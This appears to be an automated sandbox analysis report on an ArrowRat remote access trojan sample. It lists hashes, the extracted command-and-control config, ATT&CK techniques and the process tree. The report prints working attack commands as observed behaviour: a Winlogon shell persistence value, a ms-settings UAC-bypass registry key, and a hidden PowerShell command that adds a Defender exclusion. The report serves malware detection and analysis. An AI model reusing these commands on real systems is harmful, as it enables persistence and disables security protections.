arrowrat | e694001c6e68ee030e201b680d2e1916ee121fe76f050121045a3fa2465e3ed6

General

Target

Client.exe
Size

158KB
MD5

16a66efc62e16195848483277f81cb3b
SHA1

5b3b70e9df9b025576386abfa9ed7c342e8d7a46
SHA256

e694001c6e68ee030e201b680d2e1916ee121fe76f050121045a3fa2465e3ed6
SHA512

87d682acb2b44506711e4758762e16c3f29101c5a20c1b144ff2c337c37a82f8bd0bbf13c65bb1e5e2423bcf3f042cd9d114256846aeb5c8e66119b64d6d1393
SSDEEP

3072:gbzxH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPMiO8Y:gbzxe0ODhTEPgnjuIJzo+PPcfPMd8

Score

10^/10

arrowrat pf030dc1ckld12od3 discovery execution persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Pf030dc1ckld12od3

C2

192.168.1.46:1337

Mutex

QplfyCtwT

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat
Arrowrat family
arrowrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

Client.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Local\\Pan\\dora"	Client.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

PowerShell.exe

pid	Process
3436	PowerShell.exe
3436	PowerShell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Client.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	Client.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

Client.exe

description	pid	Process	procid_target
PID 1528 set thread context of 1332	1528	Client.exe	85

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies registry class 16 IoCs

Processes:

Client.exeexplorer.exeStartMenuExperienceHost.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command\DelegateExecute	Client.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell	Client.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open	Client.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Pan\\dora'"	Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings	Client.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4050598569-1597076380-177084960-1000\{D49E02E7-AC16-4137-A43A-6644A29F207A}	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\ms-settings\shell\open\command	Client.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

Client.exePowerShell.exe

pid	Process
1528	Client.exe
1528	Client.exe
1528	Client.exe
1528	Client.exe
3436	PowerShell.exe
3436	PowerShell.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

Processes:

Client.exeexplorer.exePowerShell.exe

description	pid	Process
Token: SeDebugPrivilege	1528	Client.exe
Token: SeShutdownPrivilege	2772	explorer.exe
Token: SeCreatePagefilePrivilege	2772	explorer.exe
Token: SeShutdownPrivilege	2772	explorer.exe
Token: SeCreatePagefilePrivilege	2772	explorer.exe
Token: SeShutdownPrivilege	2772	explorer.exe
Token: SeCreatePagefilePrivilege	2772	explorer.exe
Token: SeShutdownPrivilege	2772	explorer.exe
Token: SeCreatePagefilePrivilege	2772	explorer.exe
Token: SeShutdownPrivilege	2772	explorer.exe
Token: SeCreatePagefilePrivilege	2772	explorer.exe
Token: SeDebugPrivilege	3436	PowerShell.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

explorer.exe

pid	Process
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe

Suspicious use of SendNotifyMessage 8 IoCs

Processes:

explorer.exe

pid	Process
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

Client.exeStartMenuExperienceHost.exe

pid	Process
1528	Client.exe
2496	StartMenuExperienceHost.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

Client.exeComputerDefaults.exe

description	pid	Process	procid_target
PID 1528 wrote to memory of 2772	1528	Client.exe	83
PID 1528 wrote to memory of 2772	1528	Client.exe	83
PID 1528 wrote to memory of 2420	1528	Client.exe	84
PID 1528 wrote to memory of 2420	1528	Client.exe	84
PID 1528 wrote to memory of 2420	1528	Client.exe	84
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 1332	1528	Client.exe	85
PID 1528 wrote to memory of 4044	1528	Client.exe	87
PID 1528 wrote to memory of 4044	1528	Client.exe	87
PID 4044 wrote to memory of 3436	4044	ComputerDefaults.exe	89
PID 4044 wrote to memory of 3436	4044	ComputerDefaults.exe	89

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2772
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT
  2⤵
  PID:2420
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Pf030dc1ckld12od3 192.168.1.46 1337 QplfyCtwT
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1332
- C:\Windows\System32\ComputerDefaults.exe
  "C:\Windows\System32\ComputerDefaults.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
    "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Pan\dora'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3436

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2496

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

2

T1547

Active Setup

1

T1547.014

Winlogon Helper DLL

1

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

2

T1547

Active Setup

1

T1547.014

Winlogon Helper DLL

1

T1547.004

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

3

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133764099333299166.txt

Filesize
75KB

MD5
b8648a00523a127e24400564f0ffe4c6

SHA1
679567088e02d20123bd63a8bc8c70217b981582

SHA256
cf010474339a745ae8abb93048ab556b2fc84ce2b3cfdb4d484ce1cdbabc8831

SHA512
66a2bbaf218323ac0cabc0973b59440cf107b9411e5ba7b152662c97d6af50ae33b525e442f7006ef0f64290d1da7debe113a0eaa4648418543a05688b130f6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ebkgwf2k.15x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1332-6-0x0000000006120000-0x00000000066C4000-memory.dmp

Filesize
5.6MB

Download
memory/1332-11-0x0000000006920000-0x0000000006970000-memory.dmp

Filesize
320KB

Download
memory/1332-4-0x0000000005820000-0x00000000058B2000-memory.dmp

Filesize
584KB

Download
memory/1332-5-0x00000000058F0000-0x000000000598C000-memory.dmp

Filesize
624KB

Download
memory/1332-2-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/1332-8-0x0000000006060000-0x00000000060C6000-memory.dmp

Filesize
408KB

Download
memory/1344-56-0x0000022E11230000-0x0000022E11250000-memory.dmp

Filesize
128KB

Download
memory/1344-31-0x0000022E10240000-0x0000022E10340000-memory.dmp

Filesize
1024KB

Download
memory/1344-32-0x0000022E10240000-0x0000022E10340000-memory.dmp

Filesize
1024KB

Download
memory/1344-35-0x0000022E11270000-0x0000022E11290000-memory.dmp

Filesize
128KB

Download
memory/1344-66-0x0000022E116D0000-0x0000022E116F0000-memory.dmp

Filesize
128KB

Download
memory/1528-7-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/1528-0-0x00007FFD78113000-0x00007FFD78115000-memory.dmp

Filesize
8KB

Download
memory/1528-1-0x000001E3C3D30000-0x000001E3C3D5E000-memory.dmp

Filesize
184KB

Download
memory/1528-198-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2772-29-0x0000000003690000-0x0000000003691000-memory.dmp

Filesize
4KB

Download
memory/2772-182-0x0000000009DB0000-0x0000000009F59000-memory.dmp

Filesize
1.7MB

Download
memory/3436-25-0x0000029836E90000-0x0000029836EB2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads